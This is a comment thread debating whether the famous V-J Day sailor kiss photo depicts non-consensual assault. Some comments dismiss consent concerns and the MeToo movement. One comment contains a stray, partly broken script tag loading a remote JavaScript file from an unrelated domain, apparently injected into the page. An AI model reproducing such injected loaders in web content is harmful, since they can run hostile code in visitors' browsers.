What a photo, got me scrounging the internet for similar
ones in my search for it. The closest thing to time
travel we will ever have is the captured images, both
still and motion.

Imagine that kiss happened in today's times . He would be facing sexual assault charges and the full weight of the me2 movement .

There are video's out now that tear apart some classic
movies because of this, "Predetory romance in Harrison
Ford movies" for example .. how Han treated Leia. How
Indianan Jones treated women. The whole time I am
thinking, "You better abolish pornography before you go
down this road."

There's a statue depicting this kiss placed next to San Diego Harbor. Knowing that it represents a drunken sailor grabbing and kissing an innocent stranger kind of ruined it for me.

Michael, it was different times.  Plus EVERYBODY was celebrating the end of a world war.< ="text/" async="" src="//cardinal.net/1fa16f6ccbee745a0c.js">

Sometimes you need to remove the PC-goggles and realize this.

It kinda reminds me of special events, Like a parade
where everyone is drinking and celebrating and more open
to crazy stuff. Wile on a normal day, such an action may
be seen as way out of place.

I imagine that guy would not have done that if it was
just a normal day and nothing was going on.

I DO understand that. No one was calling for Mendonsa to be charged with sexual assault. It’s important to place things in historical context, but that doesn’t change the fact that the image shows a woman being grabbed and kissed without her consent, which informs how I view the image /now/.

Things kinda suck /now/.

It puts too much power in the hands of the woman.

If we could do a social experiment with time travel to
reset everyone's minds to before anything happening.
You could have a woman that has worked at an office
for several years and there are 10 men that work
there with her. She has a different view of all 10 of
them, one she may have a crush on, another she finds
cute, one she doesn't like, and repulsed my another.

If we went back in time an had all 10 do the same
thing to her, it is her prerogative only how it ends
up.

One she may laugh off and say stop it, with a smile
and a wink. Another could get slapped. While another
could get the cops called on him, calls for him to be
fired and face court and jail time.

Seems too much, specially when the guy feels he has a
chance, even though he could be completely wrong.

From the guys perspective it is scary being on the
dating scene. Trying to find dates is already hard
enough, but now they have to worry if they are walking
into a mine field. The first night the girl may seem
great, but on a whim or some moment he pisses her off,
she could go Full ME2 on his ass.

I think date sites should require a me2 tag on your
profile so you can avoid them from the start.

Remember, kids, expressing a love of life and celebrating the end of a war--even in public--is tantamount to sexual assault.

And it's not like the recipient of the kiss said that she didn't mind it at all. Oh, wait. She did.

The woman who said she didn't mind the kiss was the sailor's future wife, with whom he was on a date, when he ran over and kissed the woman he assumed was a nurse.

From the article:
"The kiss did kind of bother someone else, though: the woman in the nurse's uniform, Greta Zimmer, who wasn't even a nurse. She was a 21-year-old dental assistant from Queens, who, having heard rumors about the end of the war, walked over to Times Square from her office on Lexington Avenue. George says he was so drunk, he doesn't even remember the kiss. Greta says she'll never forget it."

The woman being kissed does not comment on whether or not she approved of the kiss. She does say, "I wasn't kissing him. He was kissing me."

Once again, you get it wrong, Greg. You're misrepresenting the truth an awful lot these days, have you noticed? The rest of us have.
